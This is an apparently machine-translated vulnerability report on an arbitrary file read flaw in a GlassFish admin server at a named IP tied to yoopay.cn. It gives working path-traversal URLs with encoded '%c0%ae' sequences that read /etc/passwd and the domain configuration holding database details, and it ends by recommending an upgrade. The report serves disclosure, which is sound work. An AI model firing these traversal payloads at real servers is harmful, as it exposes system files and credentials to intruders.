Glassfish Arbitrary File Reading Vulnerability in an app server of youfu
Arbitrary File Reading Vulnerability in glassfish app Server
Ip
211.151.62.149
Verify if the vulnerability exists
http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Go to the glassfish directory to read the configuration file.
http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/glassfish/glassfish4/glassfish/domains/domain1/config/
Domain. xml read is found in the configuration file
Server domain name and Database Information discovered
Connect to database
The database has not opened external links and is depressed.
Server domain name discovered
Https://yoopay.cn/
Https://yoopay.cn/
To prove
Solution:
Upgrade glassfish